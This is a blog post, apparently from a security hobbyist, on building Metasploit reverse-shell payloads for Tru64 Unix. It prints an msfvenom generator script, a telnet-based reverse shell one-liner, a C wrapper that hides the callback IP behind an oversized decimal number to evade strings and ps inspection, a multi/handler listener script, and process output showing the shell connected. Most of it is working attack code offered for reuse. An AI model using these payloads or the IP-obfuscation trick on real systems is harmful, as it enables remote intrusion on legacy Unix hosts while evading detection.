Tru64 Unix V5.1 Metasploit payloads pt.2

I have decided to check the current msfvenom payload options that could be suitable for Tru64 Unix once again and confirmed that only the cmd/unix/reverse works reliably enough on this platform.

Some years ago I did experiment a little with this  here  I wanted to share some interesting findings…..

So dusting off the old ways I have created a simple script to generate a shellscript for Tru64 cmd/unix/reverse via msfvenom

#!/bin/bash
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfvenom -p cmd/unix/reverse LHOST=$IP LPORT=$port EXITFUNC=thread > default.exe 
chmod +x default.exe;ls -la default.exe 
echo "Done..."

What the above script produces is the following code (IP address is in my LAB)

sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'

So this works fine if you execute it on the Tru64 system that can reach 192.168.11.2 just fine, you get your reverse shell and can do whatever.

But I did not like the plain text IP address in the script and decided to investigate how we can obfuscate this, so first thing came to mind was to create a simple C program and call the above command from it.

If you decide to use a primitive and unsafe system() call in C like this for example

system("sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'");

The compiled C code will of course run just fine, but the ps tree process list will show the telnet 192.168.11.2 connection as well as strings command on the compiled binary.

In order to obfuscate the IP address we can use an old trick to convert an IP address to decimal value.

An IP address is broken into dotted octet notation. Each octet is expressed as a decimal value from Zero to 255. Since computers start counting from zero this gives us 256 possible values for each octet. Each octet value represents its binary equivalent.
Calculating the decimal value of an IPv4 address is easy. If we were to number the octets from left to right and break them into variables called $octet1, $octet2, $octet3 and $octet4, we can use the following formulas to convert each octet into its decimal value and then add each decimal value to achieve the decimal equivalent for the IP address:
$octet1 x (256^3) = $decimal1
$octet2 x (256^2) = $decimal2
$octet3 x (256) = $decimal3
$octet4 = $decimal4
$decimal1 + $decimal2 + $decimal3 + $decimal4 = $decimal_equivalent
For example, converting IP Address 192.168.11.2 to its decimal equivalent would look like this:
192 x (256^3) = 3221225472
168 x (256^2) = 11010048
11 x 256 = 2816
2 = 2
3221225472 + 11010048 + 2816 + 2 = 3232238338
The decimal equivalent of 192.168.11.2 is 3232238338.

Now this value of 3232238338 is pingable and sshable from a normal system like so :

user@X201:~ > ping 3232238338
PING 3232238338 (192.168.11.2) 56(84) bytes of data.
64 bytes from 192.168.11.2: icmp_seq=1 ttl=64 time=66.1 ms
64 bytes from 192.168.11.2: icmp_seq=2 ttl=64 time=88.5 ms
^C
--- 3232238338 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 66.164/77.332/88.500/11.168 ms

On modern systems (Linux 64bit / Windows 8/10 64bit) you cannot have a higher value of the decimal IP address than 4294967295

user@X201:~ > ping 4294967295
Do you want to ping broadcast? Then -b
user@X201:~ > ping 4294967296
ping: unknown host 4294967296

But not so on old commercial UNIXes :)  For example on Tru64 you can go really high with your decimal value way over the 4294967295  limit and the system will somehow calculate the IP address just fine.

So I have played a little with numbers and came up with the following monster decimal value that equals 192.168.11.2  on Tru64

323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002

For Tru64 (emulating on emuvm – not physical box) anything higher than this will coredump a telnet session so this is a safe value that I have tested to get a reverse connection to metasploit listener.

Here is my lame C source code for the Tru64 payload executable

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <dirent.h>

int main (void) {
system("/usr/bin/clear");
printf("[*] Starting the Metasploit Framework connector for Tru64 ");
system("/sbin/sleep 1");
printf(".");
fflush(stdout);
system("/sbin/sleep 1");
printf("..");
fflush(stdout);
system("/sbin/sleep 1");
printf("...");
fflush(stdout);
system("/sbin/sleep 1");
printf("....");
fflush(stdout);
printf("\n[*] Connecting to target");
printf("\n[*] Using the decimal number trick to obfuscate the IP");
printf("\n[*] In this example it is the following value that passes for IP 192.168.11.2");
printf("\n-----------------------------------------------------------------------------");
printf("\n32322357823232235782323223578232322357823232235782323223578232322357823232235");
printf("\n78232301116894100023223578232301111232235782323011123223578232301112322357823");
printf("\n23011123223578232301112322357667040002");
system("/sbin/sleep 1");
fflush(stdout);
system("/sbin/sh -c '(/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)'"); 
printf("\n[*] Executing the payload ");
system("/sbin/sleep 1");
printf(".");
fflush(stdout);
system("/sbin/sleep 1");
printf("..");
fflush(stdout);
system("/sbin/sleep 1");
printf("...");
fflush(stdout);
printf("\nChecking the telnet process in ps tree");
system("/sbin/ps -ef | grep /usr/bin/telnet");
}

Compilation is done via cc on Tru64 like so

cc file.c -o file.exe

And the metasploit listener shell script looks like this

#!/bin/bash
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD cmd/unix/reverse ; set LHOST ' > run.listener.sh
echo -n $host >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n $port >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

Once executed on the Tru64, you get the connection established on your listener and get a really strange looking telnet call in the ps tree list

root 921 1 0.0 20:55:11 ?? 0:03.43 /usr/opt/java131/bin/../bin/alpha/native_threads/java -classic -mx2m -Dos.version=boot authentication.server.AuthenticationServer
root 948 1 0.0 20:55:15 ?? 0:05.74 /usr/sbin/smsd -d
root 989 1 0.0 20:56:04 ?? 1:44.99 Xvnc :1 -desktop X -httpd /usr/local/vnc/classes -auth /home/root/.Xauthority -geometry 1024x700 -depth 16 -rfbwait 120000 -rfbauth /home/root/.vnc/passwd -rfbport 5901
root 992 1 0.0 20:56:08 ?? 0:00.80 /usr/dt/bin/dtsession
root 1020 1 0.0 20:56:11 ?? 0:00.19 /usr/dt/bin/ttsession -s
root 1021 810 0.0 20:56:11 ?? 0:00.39 rpc.ttdbserverd
root 1029 992 0.0 20:56:14 ?? 0:06.24 dtwm
root 1030 992 0.0 20:56:17 ?? 0:00.52 /usr/bin/X11/dxconsole
root 1031 992 0.0 20:56:17 ?? 0:01.81 dtfile -session dtHppbgQ
root 1033 1031 0.0 20:56:35 ?? 0:00.00 dtfile -session dtHppbgQ
root 1039 1031 0.0 20:56:43 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_102_1 xterm -bg black -fg green
root 1040 1039 0.0 20:56:43 ?? 0:04.76 xterm -bg black -fg green
root 1256 1031 0.0 21:45:00 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_104_1 xterm -bg black -fg green
root 1257 1256 0.0 21:45:00 ?? 0:00.63 xterm -bg black -fg green
root 1495 1 0.0 22:27:21 ?? 0:00.02 /sbin/sleep 9000
root 1520 1 0.0 22:41:41 console 0:00.05 /usr/sbin/getty console console vt100
root 1041 1040 0.0 20:56:44 pts/1 0:05.26 -csh (tcsh)
root 1323 1 0.0 21:52:01 pts/1 0:00.02 /sbin/sleep 9000
root 1395 1 0.0 22:05:35 pts/1 0:00.02 /sbin/sleep 9000
root 1551 1 0.0 23:05:06 pts/1 0:00.03 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root 1552 1551 0.0 23:05:06 pts/1 0:00.02 /sbin/sleep 9000
root 1553 1551 0.0 23:05:06 pts/1 0:00.02 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root 1554 1551 0.0 23:05:06 pts/1 0:00.00 /sbin/sh -c (/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)
root 1555 1554 0.0 23:05:07 pts/1 0:00.01 /sbin/sh
root 1561 1555 0.0 23:05:30 pts/1 0:00.14 ps -ef
root 1258 1257 0.0 21:45:00 pts/2 0:00.29 -csh (tcsh)
root 1285 1 0.0 21:47:18 pts/2 0:00.02 /sbin/sleep 9000

This IP trick works on AIX and Tru64, Solaris is not affected by this, had no chance yet to verify HP-UX but I bet it will work there too.

And of course some movie in the end to check how it works in real life

And an audio equivalent would be this

P.S

Greetings to Markus (you know who you are) for the Alpha VMS and Tru64 inspiration many years ago !

P.P.S

Rotten dried fish that Sasha was eating, and the flying nails when he was clipping ’em brings back nice memories :)

P.P.P.S

Fuqz go to Ron, Luigi, Aram, John and the biggest fucker BILL ! (you know who you are)

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s